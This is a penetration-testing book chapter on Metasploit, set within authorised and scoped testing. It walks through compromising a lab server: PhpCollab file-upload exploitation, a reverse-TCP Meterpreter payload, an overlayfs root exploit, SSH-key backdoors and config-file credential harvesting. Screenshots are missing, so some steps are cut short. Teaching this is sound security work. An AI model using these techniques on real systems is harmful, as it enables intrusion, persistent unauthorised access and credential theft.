Penetration testing is an intentional attack on a computer-based system where the intention is to find vulnerabilities, security weaknesses, and certifying whether a system is secure. A penetration test will advise an organization on their security posture if it is vulnerable to an attack, whether the implemented security is enough to oppose any invasion, which security controls can be bypassed, and much more. Hence, a penetration test focuses on improving the security posture of an organization.
Achieving success in a penetration test largely depends on using the right set of tools and techniques. A penetration tester must choose the right set of tools and methodologies to complete a test. While talking about the best tools for penetration testing, the first one that comes to mind is Metasploit. It is considered one of the most effective auditing tools to carry out penetration testing today. Metasploit offers a wide variety of exploits, an excellent exploit development environment, information gathering and web testing capabilities, and much more.
This book has been written so that it will not only cover the frontend perspectives of Metasploit, but it will also focus on the development and customization of the framework as well. This book assumes that the reader has basic knowledge of the Metasploit framework. However, some of the sections of this book will help you recall the basics as well.
While covering Metasploit from the very basics to the elite level, we will stick to a step-by-step approach, as shown in the following diagram:
In this chapter, you will learn about the following topics:
- The phases of penetration testing
- The basics of the Metasploit framework
- The workings of Metasploit exploit and scanner modules
- Testing a target network with Metasploit
- The benefits of using databases
- Pivoting and diving deep into internal networks
An important point to take note of here is that we might not become an expert penetration tester in a single day. It takes practice, familiarization with the work environment, the ability to perform in critical situations, and most importantly, an understanding of how we have to cycle through the various stages of a penetration test.
When we think about conducting a penetration test on an organization, we need to make sure that everything is set correctly and is according to a penetration test standard. Therefore, if you feel you are new to penetration testing standards or uncomfortable with the term Penetration Testing Execution Standard (PTES), please refer to http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines to become more familiar with penetration testing and vulnerability assessments. According to PTES, the following diagram explains the various phases of a penetration test:
Refer to the pentest standard website,Â http://www.pentest-standard.org/index.php/Main_PageÂ to set up the hardware and systematic stages to be followed in setting up a work environment.
The very first phase of a penetration test, preinteractions, involves a discussion of the critical factors regarding the conduct of a penetration test on a client's organization, company, institute, or network with the client itself. This phase serves as the connecting line between the penetration tester, the client, and his/her requirements. Preinteractions help a client get enough knowledge on what is to be performed over his or her network/domain or server.
Therefore, the tester will serve here as an educator to the client. The penetration tester also discusses the scope of the test, gathers knowledge on all the domains under the scope of the project, and any special requirements that will be needed while conducting the analysis. The requirements include special privileges, access to critical systems, network or system credentials, and much more. The expected positives of the project should also be the part of the discussion with the client in this phase. As a process, preinteractions discuss some of the following key points:
- Scope: This section reviews the scope of the project and estimates the size of the project. The scope also defines what to include for testing and what to exclude from the test. The tester also discusses IP ranges and domains under the scope and the type of test (black box or white box). In case of a white box test, the tester discusses the kind of access and required credentials as well; the tester also creates, gathers, and maintains questionnaires for administrators. The schedule and duration of the test, whether to include stress testing or not, and payment, are included in the scope. A general scope document provides answers to the following questions:
- What are the target organization's most significant security concerns?
- What specific hosts, network address ranges, or applications should be tested?
- What specific hosts, network address ranges, or applications should explicitly NOT be tested?
- Are there any third parties that own systems or networks that are in the scope, and which systems do they hold (written permission must have been obtained in advance by the target organization)?
- Will the test be performed in a live production environment or a test environment?
- Will the penetration test include the following testing techniques: ping sweep of network ranges, a port scan of target hosts, vulnerability scan of targets, penetration of targets, application-level manipulation, client-side Java/ActiveX reverse engineering, physical penetration attempts, social engineering?
- Will the penetration test include internal network testing? If so, how will access be obtained?
- Are client/end user systems included in the scope? If so, how many clients will be leveraged?
- Is social engineering allowed? If so, how may it be used?
- Is Denial of Service attacks allowed?
- Are dangerous checks/exploits allowed?
- Goals: This section discusses various primary and secondary objectives that a penetration test is set to achieve. The common questions related to the goals are as follows:
- What is the business requirement for this penetration test?
- Is the test required by a regulatory audit or just a standard procedure?
- What are the objectives?
- Map out vulnerabilities
- Demonstrate that the vulnerabilities exist
- Test the incident response
- Actual exploitation of a vulnerability in a network, system, or application
- All of the above
- Testing terms and definitions: This phase discusses basic terminologies with the client and helps the client in understanding the terms well
- Rules of engagement: This section defines the time of testing, timeline, permissions to attack, and regular meetings to update the status of the ongoing test. The common questions related to rules of engagement are as follows:
- At what time do you want these tests to be performed?
- During business hours
- After business hours
- Weekend hours
- During a system maintenance window
- Will this testing be done in a production environment?
- If production environments should not be affected, does a similar environment (development or test systems) exist that can be used to conduct the penetration test?
- Who is the technical point of contact?
- At what time do you want these tests to be performed?
For more information on preinteractions, refer to:Â http://www.pentest-standard.org/index.php/File:Pre-engagement.png.
In the intelligence-gathering stage, you need to gather as much information as possible about the target network. The target network could be a website, an organization, or might be a full-fledged fortune company. The most important aspect is to gather information about the target from social media networks and use Google Hacking (a way to extract sensitive information from Google using specific queries) to find confidential and sensitive information related to the organization to be tested. Footprinting the organization using active and passive attacks can also be an approach.
The intelligence gathering phase is one of the most crucial aspects of penetration testing. Correctly gained knowledge about the target will help the tester to simulate appropriate and exact attacks, rather than trying all possible attack mechanisms; it will also help the tester save a considerable amount of time as well. This phase will consume 40 to 60 percent of the total time of testing, as gaining access to the target depends mainly upon how well the system is footprinted.
A penetration tester must gain adequate knowledge about the target by conducting a variety of scans, looking for open ports, service identification, and choosing which services might be vulnerable and how to make use of them to enter the desired system.
The procedures followed during this phase are required to identify the security policies and mechanisms that are currently deployed on the target infrastructure, and to what extent they can be circumvented.
Here, we will be testing a server to check what level of bandwidth and resource stress the server can bear or in simple terms, how the server is responding to the Denial of Service (DoS) attack. A DoS attack or a stress test is the name given to the procedure of sending indefinite requests or data to a server to check whether the server can handle and respond to all the requests successfully or crashes causing a DoS. A DoS can also occur if the target service is vulnerable to specially crafted requests or packets. To achieve this, we start our network stress testing tool and launch an attack towards a target website. However, after a few seconds of launching the attack, we see that the server is not responding to our browser and the site does not open. Additionally, a page shows up saying that the website is currently offline. So what does this mean? Did we successfully take out the web server we wanted? Nope! In reality, it is a sign of a protection mechanism set by the server administrator that sensed our malicious intent of taking the server down and hence resulted in the ban of our IP address. Therefore, we must collect correct information and identify various security services at the target before launching an attack.
A better approach is to test the web server from a different IP range. Maybe keeping two to three different virtual private servers for testing is the right approach. Also, I advise you to test all the attack vectors under a virtual environment before launching these attack vectors onto the real targets. Proper validation of the attack vectors is mandatory because if we do not validate the attack vectors before the attack, it may crash the service at the target, which is not favorable at all. Network stress tests should be performed towards the end of the engagement or in a maintenance window. Additionally, it is always helpful to ask the client for whitelisting IP addresses, which are used for testing.
Now, let's look at the second example. Consider a black box test against a Windows 2012 server. While scanning the target server, we find that port
80 and port
8080 are open. On port
80, we see the latest version of Internet Information Services (IIS) running, while on port
8080, we discover that the vulnerable version of the Rejetto HFS Server is running, which is prone to the Remote Code Execution flaw.
However, when we try to exploit this vulnerable version of HFS, the exploit fails. The situation is a typical scenario where the firewall blocks malicious inbound traffic.
In this case, we can simply change our approach to connecting back from the server, which will establish a connection from the target back to our system, rather than us connecting to the server directly. The change may prove to be more successful as firewalls are commonly being configured to inspect ingress traffic rather than egress traffic.
As a process, this phase can be broken down into the following key points:
- Target selection: Selecting the targets to attack, identifying the goals of the attack, and the time of the attack.
- Covert gathering: This involves the collection of data from the physical site, the equipment in use, and dumpster diving. This phase is a part of on-location white box testing only.
- Footprinting: Footprinting consists of active or passive scans to identify various technologies and software deployed on the target, which includes port scanning, banner grabbing, and so on.
- Identifying protection mechanisms: This involves identifying firewalls, filtering systems, network- and host-based protections, and so on.
For more information on gathering intelligence, refer to:Â http://www.pentest-standard.org/index.php/Intelligence_Gathering.
Threat modeling helps in conducting a comprehensive penetration test. This phase focuses on modeling out true threats, their effect, and their categorization based on the impact they can cause. Based on the analysis made during the intelligence gathering phase, we can model the best possible attack vectors. Threat modeling applies to business asset analysis, process analysis, threat analysis, and threat capability analysis. This phase answers the following set of questions:
- How can we attack a particular network?
- To which critical sections do we need to gain access?
- What approach is best suited for the attack?
- What are the highest-rated threats?
Modeling threats will help a penetration tester to perform the following set of operations:
- Gather relevant documentation about high-level threats
- Identify an organization's assets on a categorical basis
- Identify and categorize risks
- Mapping threats to the assets of a corporation
Consider a black box test against a company's website. Here, information about the company's clients is the primary asset. It is also possible that in a different database on the same backend, transaction records are also stored. In this case, an attacker can use the threat of a SQL injection to step over to the transaction records database. Hence, transaction records are the secondary asset. Having the sight of impacts, we can map the risk of the SQL injection attack to the assets.
Vulnerability scanners such as Nexpose and the Pro version of Metasploit can help model threats precisely and quickly by using the automated approach. Hence, it can prove to be handy while conducting extensive tests.
For more information on the processes involved during the threat modeling phase, refer to:Â http://www.pentest-standard.org/index.php/Threat_Modeling.
Vulnerability analysis is the process of discovering flaws in a system or an application. These flaws can vary from a server to the web applications, from insecure application design to vulnerable database services, and from a VOIP-based server to SCADA-based services. This phase contains three different mechanisms, which are testing, validation, and research. Testing consists of active and passive tests. Validation consists of dropping the false positives and confirming the existence of vulnerabilities through manual validations. Research refers to verifying a vulnerability that is found and triggering it to prove its presence.
For more information on the processes involved during the threat-modeling phase, refer to:Â http://www.pentest-standard.org/index.php/Vulnerability_Analysis.
The exploitation phase involves taking advantage of the previously discovered vulnerabilities. This stage is the actual attack phase. In this phase, a penetration tester fires up exploits at the target vulnerabilities of a system to gain access. This phase is covered heavily throughout the book.
The post-exploitation phase is the latter phase of exploitation. This stage covers various tasks that we can perform on an exploited system, such as elevating privileges, uploading/downloading files, pivoting, and so on.
For more information on the processes involved during the exploitation phase, refer to:Â http://www.pentest-standard.org/index.php/Exploitation. For more information on post-exploitation, refer to http://www.pentest-standard.org/index.php/Post_Exploitation.
Creating a formal report of the entire penetration test is the last phase to conduct while carrying out a penetration test. Identifying key vulnerabilities, creating charts and graphs, recommendations, and proposed fixes are a vital part of the penetration test report. An entire section dedicated to reporting is covered in the latter half of this book.
For more information on the processes involved during the threat modeling phase, refer to:Â http://www.pentest-standard.org/index.php/Reporting.
- How well is your test lab configured?
- Are all the required tools for testing available?
- How good is your hardware to support such tools?
Before using Metasploit, we need to have a test lab. The best idea for setting up a test lab is to gather different machines and install different operating systems on them. However, if we only have a single device, the best idea is to set up a virtual environment.
Virtualization plays an essential role in penetration testing today. Due to the high cost of hardware, virtualization plays a cost-effective role in penetration testing. Emulating different operating systems under the host operating system not only saves you money but also cuts down on electricity and space. However, setting up a virtual penetration test lab prevents any modifications on the actual host system and allows us to perform operations in an isolated environment. A virtual network enables network exploitation to run in an isolated network, thus preventing any modifications or the use of network hardware of the host system.
Moreover, the snapshot feature of virtualization helps preserve the state of the virtual machine at a particular point in time. This feature proves to be very helpful, as we can compare or reload a previous state of the operating system while testing a virtual environment without reinstalling the entire software in case the files are modified after attack simulation.
Virtualization expects the host system to have enough hardware resources, such as RAM, processing capabilities, drive space, and so on, to run smoothly.
For more information on snapshots, refer to:Â https://www.virtualbox.org/manual/ch01.html#snapshots.
You can always download pre-built VMware and VirtualBox images for Kali Linux here: https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/.
To create a virtual environment, we need virtual machine software. We can use any one of two of the most popular ones: VirtualBox and VMware Workstation Player. So, let's begin with the installation by performing the following steps:
- Download VMware Workstation Player (https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/14_0) and set it up for your machine's architecture.
- Run the setup and finalize the installation.
- Download the latest Kali VM Image (https://images.offensive-security.com/virtual-images/kali-linux-2017.3-vm-amd64.ova)
- Run the VM Player program, as shown in the following screenshot:
- Next, go to the
Playertab and choose
- Browse to the extracted
*.ovafile for Kali Linux and click
Open. We will be presented with the following screen:
- After a successful import, we can see the newly added virtual machine in the list of virtual machines, as shown in the following screenshot:
- Next, we just need to start the operating system. The good news is that the pre-installed VMware Image of Kali Linux is shipped along with VMware Tools which makes features such as drag and drop, mounting shared folders, and so on to be available on the fly.
- The default credentials for Kali Linux are
toor, where the
rootis the username and
toor, is the password.
For the complete persistent install guide on Kali Linux, refer to:Â https://docs.kali.org/category/installation. To install Metasploit through the command line in Linux, refer to:Â http://www.darkoperator.com/installing-metasploit-in-ubunt/. To install Metasploit on Windows, refer to an excellent guide here:Â https://www.packtpub.com/mapt/book/networking_and_servers/9781788295970/2/ch02lvl1sec20/installing-metasploit-on-windows.
Since we have recalled the essential phases of a penetration test and completed the setup of Kali Linux, let's talk about the big picture; that is, Metasploit. Metasploit is a security project that provides exploits and tons of reconnaissance features to aid the penetration tester. Metasploit was created by H.D. Moore back in 2003, and since then, its rapid development has led it to be recognized as one of the most popular penetration testing tools. Metasploit is entirely a Ruby-driven project and offers a lot of exploits, payloads, encoding techniques, and loads of post-exploitation features.
Metasploit comes in various editions, as follows:
- Metasploit Pro: This version is a commercial one and offers tons of great features such as web application scanning, exploitation, automated exploitation, and is quite suitable for professional penetration testers and IT security teams. The Pro edition is primarily used for professional, advanced and large penetration tests, and enterprise security programs.
- Metasploit Express: The express edition is used for baseline penetration tests. Features in this version of Metasploit include smart exploitation, the automated brute forcing of the credentials, and much more. This version is quite suitable for IT security teams in small to medium size companies.
- Metasploit Community: This is a free edition with reduced functionalities of the express version. However, for students and small businesses, this version is a favorable choice.
- Metasploit Framework: This is a command-line edition with all the manual tasks, such as manual exploitation, third-party import, and so on. This version is suitable for developers and security researchers.
Throughout this book, we will be using the Metasploit Community and Framework editions. Metasploit also offers various types of user interfaces, as follows:
- The GUI interface: The GUI has all the options available at the click of a button. This interface offers a user-friendly interface that helps to provide cleaner vulnerability management.
- The console interface: This is the preferred interface and the most popular one as well. This interface provides an all-in-one approach to all the options offered by Metasploit. This interface is also considered one of the most stable interfaces. Throughout this book, we will be using the console interface the most.
- The command-line interface: The command-line interface is the most powerful interface. It supports the launching of exploits to activities such as payload generation. However, remembering every command while using the command-line interface is a difficult job.
- Armitage: Armitage by Raphael Mudge added a cool hacker-style GUI interface to Metasploit. Armitage offers easy vulnerability management, built-in NMAP scans, exploit recommendations, and the ability to automate features using the Cortana scripting language. An entire chapter is dedicated to Armitage and Cortana in the latter half of this book.
For more information on the Metasploit community, refer to:Â https://blog.rapid7.com/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community/.
After setting up Kali Linux, we are now ready to perform our first penetration test with Metasploit. However, before we start the test, let's recall some of the essential functions and terminologies used in the Metasploit framework.
After we run Metasploit, we can list all the useful commands available in the framework by typing help or ? in the Metasploit console. Let's recall the basic terms used in Metasploit, which are as follows:
- Exploits: This is a piece of code that, when executed, will exploit the vulnerability of the target.
- Payload: This is a piece of code that runs at the target after successful exploitation. It defines the actions we want to perform on the target system.
- Auxiliary: These are modules that provide additional functionalities such as scanning, fuzzing, sniffing, and much more.
- Encoders: Encoders are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.
- Meterpreter: Meterpreter is a payload that uses in-memory DLL injection stagers. It provides a variety of functions to perform at the target, which makes it a popular choice.
Now, let's recall some of the basic commands of Metasploit that we will use in this chapter. Let's see what they are supposed to do:
To select a particular module to start working with
To see the list of available modules of a particular type
To set a value to a particular object
To set a value to a particular object globally, so the values do not change when a module is switched on
To launch an auxiliary module after all the required options are set
To launch an exploit
To unselect a module and move back
To list the information related to a particular exploit/module/auxiliary
To find a particular module
To check whether a particular target is vulnerable to the exploit or not
To list the available sessions
Let's have a look at the basic Meterpreter commands as well:
To list system information of the compromised host
To list the network interfaces on the compromised host
List of IP and MAC addresses of hosts connected to the target
To send an active session to the background
To drop a cmd shell on the target
To get the current user's details
To escalate privileges and gain SYSTEM access
To gain the process ID of the meterpreter access
To list all the processes running on the target
Since we have now recalled the basics of Metasploit commands, let's have a look at the benefits of using Metasploit over traditional tools and scripts in the next section.
If you are using Metasploit for the very first time, refer to https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/ for more information on basic commands.
Before we jump into an example penetration test, we must know why we prefer Metasploit to manual exploitation techniques. Is this because of a hacker-like Terminal that gives a pro look, or is there a different reason? Metasploit is a preferable choice when compared to traditional manual techniques because of specific factors that are discussed in the following sections.
One of the top reasons why one should go with the Metasploit framework is because it is open source and actively developed. Various other highly paid tools exist for carrying out penetration testing. However, Metasploit allows its users to access its source code and add their custom modules. The Pro version of Metasploit is chargeable, but for the sake of learning, the community edition is mostly preferred.
Using Metasploit is easy. However, here, ease of use refers to natural naming conventions of the commands. Metasploit offers excellent comfort while conducting a massive network penetration test. Consider a scenario where we need to test a network with 200 systems. Instead of checking each system one after the other, Metasploit offers to examine the entire range automatically. Using parameters such as subnet and Classless Inter-Domain Routing (CIDR) values, Metasploit tests all the systems to exploit the vulnerability, whereas using manual techniques, we might need to launch the exploits manually onto 200 systems. Therefore, Metasploit saves a significant amount of time and energy.
Most importantly, switching between payloads in Metasploit is easy. Metasploit provides quick access to change payloads using the
set payload command. Therefore, turning the Meterpreter or shell-based access into a more specific operation, such as adding a user and getting the remote desktop access, becomes easy. Generating shellcode to use in manual exploits also becomes easy by using the
msfvenom application from the command line.
Metasploit is also responsible for making a much cleaner exit from the systems it has compromised. A custom-coded exploit, on the other hand, can crash the system while exiting its operations. Making a clean exit is indeed an essential factor in cases where we know that the service will not restart immediately.
Consider a scenario where we have compromised a web server, and while we were making an exit, the exploited application crashes. The scheduled maintenance time for the server is left over with 50 days' time. So, what do we do? Shall we wait for the next 50 odd days for the service to come up again, so that we can exploit it again? Moreover, what if the service comes back after being patched? We could only end up kicking ourselves. This also shows a clear sign of poor penetration testing skills. Therefore, a better approach would be to use the Metasploit framework, which is known for making much cleaner exits, as well as offering tons of post-exploitation functions, such as persistence, that can help maintain permanent access to the server.
Metasploit offers friendly GUI and third-party interfaces, such as Armitage. These interfaces tend to ease the penetration testing projects by providing services such as easy-to-switch workspaces, vulnerability management on the fly, and functions at a click of a button. We will discuss these environments more in the later chapters of this book.
Recalling the basics of Metasploit, we are all set to perform our first penetration test with Metasploit. Consider an on-site scenario where we are asked to test an IP address and check if it's vulnerable to an attack. The sole purpose of this test is to ensure all proper checks are in place or not. The scenario is quite straightforward. We presume that all the pre-interactions are carried out with the client, and that the actual testing phase is going to start.
Please refer to the Revisiting the case study section if you want to perform the hands-on alongside reading the case study, as this will help you emulate the entire case study with exact configuration and network details.
As discussed earlier, the gathering intelligence phase revolves around collecting as much information as possible about the target. This includes performing active and passive scans, which include port scanning, banner grabbing, and various other scans. The target under the current scenario is a single IP address, so here, we can skip gathering passive information and can continue with the active information gathering methodology only.
Let's start with the footprinting phase, which includes port scanning, banner grabbing, ping scans to check whether the system is live or not, and service detection scans.
To conduct footprinting and scanning, Nmap proves as one of the finest tools available. Reports generated by Nmap can be easily imported into Metasploit. However, Metasploit has inbuilt Nmap functionalities, which can be used to perform Nmap scans from within the Metasploit framework console and store the results in the database.
Refer to https://nmap.org/bennieston-tutorial/Â for more information on Nmap scans. Refer to an excellent book on Nmap at:Â https://www.packtpub.com/networking-and-servers/nmap-6-network-exploration-and-security-auditing-cookbook.
It is always a better approach to store the results automatically alongside when you conduct a penetration test. Making use of databases will help us build a knowledge base of hosts, services, and the vulnerabilities in the scope of a penetration test. To achieve this functionality, we can use databases in Metasploit. Connecting a database to Metasploit also speeds up searching and improves response time. The following screenshot depicts a search when the database is not connected:
We saw in the installation phase how we can initialize the database for Metasploit and start it. To check if Metasploit is currently connected to a database or not, we can just type the
db_status command, as shown in the following screenshot:
There might be situations where we want to connect to a separate database rather than the default Metasploit database. In such cases, we can make use of
db_connect command, as shown in the following screenshot:
To connect to a database, we need to supply a username, password, and a port with the database name along with the
This command is used to interact with databases other than the default one
This command is used to export the entire set of data stored in the database for the sake of creating reports or as an input to another tool
This command is used for scanning the target with Nmap, and storing the results in the Metasploit database
This command is used to check whether database connectivity is present or not
This command is used to disconnect from a particular database
This command is used to import results from other tools such as Nessus, Nmap, and so on
This command is used to rebuild the cache if the earlier cache gets corrupted or is stored with older results
Starting a new penetration test, it is always good to separate previously scanned hosts and their respective data from the new pentest so that it doesn't get merged. We can do this in Metasploit before starting a new penetration test by making use of the
workspace command, as shown in the following screenshot:
To add a new workspace, we can issue theÂ
workspace -a command, followed by an identifier. We should keep identifiers as the name of the organization currently being evaluated, as shown in the following screenshot:
We can see that we have successfully created a new workspace using the
-a switch. Let's switch the workspace by merely issuing the
workspace command followed by the workspace name, as shown in the preceding screenshot. Having the workspace sorted, let's quickly perform a Nmap scan over the target IP and see if we can get some exciting services running on it:
The scan results are frankly heartbreaking. No services are running on the target except on port
By default, Nmap scans the top 1000 ports only. We can use
-p- switch to scan all the 65535 ports.
Since we are connected to the Metasploit database, everything we examine gets logged to the database. Issuing
services commands will populate all the scanned services from the database. Also, let's perform a version detection scan through
db_nmap using the
-sV switch, as shown in the following screenshot:
The previous Nmap scan found port
80 and logged it in the database. However, the version detection scan found the service running on port
80 which is Apache 2.4.7 Web Server, found the MAC address, the OS type, and updated the entry in the database, as shown in the preceding screenshot. Since gaining access requires explicitly the exact exploit targeting a particular version of the software, it's always good to perform a double check on the version information. Metasploit contains an inbuilt auxiliary module for HTTP version fingerprinting. Let's make use of it, as shown in the following screenshot:
To launch the
http_version scanner module, we issue the
use command followed by the path of the module, which in our case is
auxiliary/scanner/http/http_version. All scanning-based modules have the
RHOSTS option to incorporate a broad set of IP addresses and subnets. However, since we are only testing a single IP target, we specify
RHOSTS to the target IP address, which is
192.168.174.132 by using the
set command. Next, we just make the module execute using the
run command, as shown in the following screenshot:
This version of Apache is precisely the version we found in the previous Nmap scan. This version of Apache web server running on the target is secure, and none of the public exploits are present at exploit databases such as
0day.today. Hence, we are left with no other option than looking for vulnerabilities in the web application, if there are any. Let's try browsing this IP address and see if we can find something:
After loading the
auxiliary/scanner/http/dir_scanner module, let's provide it with a dictionary file containing a list of known directories by setting the path in the
DICTIONARY parameter. Also, we can speed up the process by increasing the number of threads by setting the
THREADS parameter to
1. Let's run the module and analyze the output:
The space character between the individual directory entries has yielded a lot of false positives. However, we got 302 response code from a
phpcollab directory, which indicated that while trying to access
phpcollab directory, the module got a response to redirect (302). The response is interesting; let's see what we get when we try to open the
phpcollab directory from the browser:
Nice! We have a PHP-based application running. Hence, we got a 302 response in the Metasploit module.
From the intelligence gathering phase, we can see that only port
80 is open on the target system and the application running on it isn't vulnerable and is running the PhpCollab Web application on it. To gain access to the PhpCollab portal, trying some random passwords and username yields no success. Even searching Metasploit, we don't have modules for PhpCollab:
Let's try searching PhpCollab using the
searchsploit tool from https://exploit-db.com/. The searchsploit allows you to easily search from all the exploits currently hosted on exploit database website as it maintains an offline copy of all the exploits:
Voila! We have an exploit for PhpCollab, and the good news is that it's already in the Metasploit exploit format.
The application can get compromised if an attacker uploads a malicious PHP file by sending a
POST request on the
/clients/editclient.php?id=1&action=update URL. The code does not validate the request if it's originating from an authenticated user or not. The problematic code is as follows:
From line number 2, we can see that the uploaded file is saved to the
logos_clients directory with the name as
$id followed by the
$extention, which means that since we have
id=1 in the URL, the uploaded backdoor will be saved as
1.php in the
For more information on this vulnerability, refer to: https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/.
To gain access to the target, we need to copy this exploit into Metasploit. However, copying external exploits directly to Metasploit's exploit directory is highly discouraged and bad practice since you will lose the modules on every update. It's better to keep external modules in a generalized directory rather than Metasploit's
modules directory. However, the best possible way to keep the modules is to create a similar directory structure elsewhere on the system and load it using the
loadpath command. Let's copy the found module to some directory:
Let's create the directory structure, as shown in the following screenshot:
We can see that we created a Metasploit-friendly structure in the
MyModules folder which is
modules/exploits/nipun, and moved the exploit into the directory as well. Let's load this structure into Metasploit as follows:
We have successfully loaded the exploit into Metasploit. Let's use the module, as shown in the following screenshot:
The module requires us to set the address of the remote host, remote port, and the path to the PhpCollab application. Since the path (
TARGETURI) and the remote port (
RPORT) are already set, let's set
RHOST to the IP address of the target and issue the
Voila! We got access to the system. Let's make use of some of the basic post-exploitation commands and analyze the output, as shown in the following screenshot:
As we can see in the preceding screenshot, running the
sysinfo command harvests the system's information such as computer name, OS, architecture, which is the 64-bit version, and the Meterpreter version, which is a PHP-based Meterpreter. Let's drop into a system shell on the compromised host using the
shell command, as shown in the following screenshot:
We can see that as soon as we dropped into a system shell, running commands such as
id provides us with the input that our current user is using,
www-data which means that to gain complete control of this system, we require root privileges. Additionally, issuing the
lsb_release -a command outputs the OS version with the exact release and codename. Let's take a note of it as it would be required in gaining root access to the system. However, before we move on to the rooting part, let's gain some of the basic information from the system, such as the current process ID using the
getpid command, the current user ID using the
getuid command, the
uuid for the unique user identifier, and the
machine_id, which is the identifier to the compromised machine. Let's run all of the commands we just discussed and analyze the output:
The amount of information we got is pretty straightforward. We have the ID of the current process our Meterpreter is sitting in, we have the user ID, UUID, and the machine ID. However, an important thing to take note of here is that our access is PHP Meterpreter-based and the limitation of the PHP Meterpreter is that we can't run privileged commands which can easily be provided by more concrete binary Meterpreter shells such as reverse TCP. First, let's escalate us onto a more concrete shell to gain a better level of access to the target. We will make use of the
msfvenom command to create a malicious payload; we will then upload it to the target system and execute it. Let's get started:
Since our compromised host is running on a 64-bit architecture, we will use the 64-bit version of the Meterpreter, as shown in the preceding screenshot. MSFvenom generates robust payloads based on our requirements. We have specified the payload using the
-p switch, and it is none other than
linux/x64/meterpreter/reverse_tcp. This payload is the 64-bit Linux compatible Meterpreter payload which, once executed on the compromised system, will connect back to our listener and will provide us with access to the machine. Since the payload has to connect back to us, it should know where to connect to. We specify the
LPORT options for this very reason, where
LHOST serves as our IP address where our listener is running, and
LPORT specifies the port for the listener. We are going to use the payload on a Linux machine. Therefore, we specify the format (
-f) to be elf, which is the default executable binary format for Linux-based operating systems. The
-b option is used to specify the bad characters which may encounter problems in the communication and may break the shellcode. More information on bad characters and their evasion will follow in the upcoming chapters. Finally, we write the payload to the
Next, since we already have a PHP Meterpreter access on the machine, let's upload the newly created payload using the
upload command, which is followed by the path of the payload, as shown in the preceding screenshot. We can verify the current path of the upload by issuing the
pwd command, which signifies the current directory we are working with. The uploaded payload, once executed, will connect back to our system. However, we need something on the receiving end as well to handle the connections. Let's run a handler which will handle the incoming connections, as shown in the following screenshot:
We can see that we pushed our PHP Meterpreter session to the background using the
background command. Let's use the
exploit/multi/handler module and set the same payload, LHOST, and LPORT we used in
reverse_connect.elf and run the module using the
-j command starts the handler in background mode as a job and can handle multiple connections, all in the background.
We have successfully set up the handler. Next, we just need to execute the payload file on the target, as shown in the following screenshot:
We can see that we just dropped in a shell using the shell command. We checked the current working directory on the target using the
pwd command. Next, we gave executable permissions to the payload file so we can execute it and finally, we ran the
reverse_connect.elf executable in the background using the
&Â identifier. The preceding screenshot shows that as soon as we run the executable, a new Meterpreter session gets opened to the target system. Using the
sessions -i command, we can see that we now have two Meterpreters on the target:
However, x64/Linux Meterpreter is apparently a better choice over the PHP Meterpreter, and we will continue interacting with the system through this Meterpreter unless we gain a more privileged Meterpreter. However, if anything goes unplanned, we can switch access to the PHP Meterpreter and re-run this payload like we just did. An important point here is that no matter if we have got a better level of access type on the target, we are still a low privileged users, and we would like to change that. The Metasploit framework incorporates an excellent module called
local_exploit_suggester, which aids privilege escalation. It has a built-in mechanism to check various kinds of local privilege escalation exploits and will suggest the best one to use on the target. We can load this module, as shown in the following screenshot:
We loaded the module using the
use command followed by the absolute path of the module, which is
post/multi/recon/local_exploit_suggester. Since we want to use this exploit on the target, we will naturally choose the better Meterpreter to route our checks. Hence, we set
2 to route our check through
SESSION 2, which is the identifier for x64/Linux Meterpreter. Let's run the module and analyze the output:
Simply amazing! We can see that the
suggester module states that the
overlayfs_priv_esc local exploit module from the
exploit/linux directory can be used on the target to gain root access. However, I leave it as an exercise for you all to complete. Let's do it manually by downloading the local root exploit on the target, compiling and executing it to get root access on the target system. We can download the exploit from: https://www.exploit-db.com/exploits/37292. However, let's gather some of the details about this exploit in the next section.
overlayfs privilege escalation vulnerability allow local users to gain root privileges by leveraging a configuration in which
overlayfs is permitted in an arbitrary mounted namespace. The weakness lies because the implementation of
overlayfs does not correctly check the permissions for file creation in the upper filesystem directory.
More on the vulnerability can be found here: https://www.cvedetails.com/cve/cve-2015-1328.
Let's drop into a shell and download the raw exploit onto the target from https://www.exploit-db.com/:
Let's rename the exploit from
37292.c and compile it with
gcc, which will generate an executable, as shown in the following screenshot:
Bingo! As we can see, by running the exploit, we have gained access to the root shell; this marks the total compromise of this system. Let's run some of the basic commands and confirm our identity as follows:
Remember, we have an exploit handler running in the background? Let's run the same
We can see that we have the third Meterpreter from the target system. However, the UID, that is, the user ID, is
0, which denotes the root user. Hence, this Meterpreter is running with root privileges and can provide us unrestricted entry to the entire system. Let's interact with the session using the
session -i command followed by the session identifier, which is
3 in this case:
We can confirm the root identity through the
getuid command, as shown in the preceding screenshot. We now have the complete authority of the system, so what's next?
Keeping access to the target system is a desired feature, especially when it comes to law enforcement agencies or by the red teams to test defenses deployed on the target. We can achieve persistence through Metasploit on a Linux server using the
sshkey_persistence module from the
post/linux/manage directory. This module adds our SSH key or creates a new one and adds it to all the users who exist on the target server. Therefore, the next time we want to login to the server, it will never ask us for a password and will simply allow us inside with the key. Let's see how we can achieve this:
We just need to set the session identifier using the set
SESSION command followed by the session identifier. We will make use of the session with the highest level of privileges. Hence, we will use
3 as the
SESSION identifier and directly run the module as follows:
We can see that the module created a new SSH key and then added it to two users on the target system, that is,
claire. We can verify our backdoor access by connecting to the target on SSH with either
root or the user
claire, or both, as follows:
Amazing! We can see that we logged into the target system by making use of the newly created SSH key using the
-i option, as shown in the preceding screen. Let's see if we can also log in as the user
Yup! We can log in with both of the backdoored users.
Most of the servers do not permit root login. Hence, you can edit the
sshd config file and change the root login to
yes and restart the SSH service on the target.
Try to backdoor only a single user such as the root since, most of the folks won't log in through the root as default configurations prohibit it.
No matter what operating system we have compromised, Metasploit offers a dozen of post-exploitation reconnaissance modules which harvest gigs of data from the compromised machine. Let's make use of one such module:
enum_configs post-exploitation module, we can see that we have gathered all the configuration files which existed on the target. These configs help uncover passwords, password patterns, information about the services running, and much much more. Another great module is
enum_system, which harvests information such as OS-related information, user accounts, services running, cron jobs running, disk information, log files, and much more, as shown in the following screenshot:
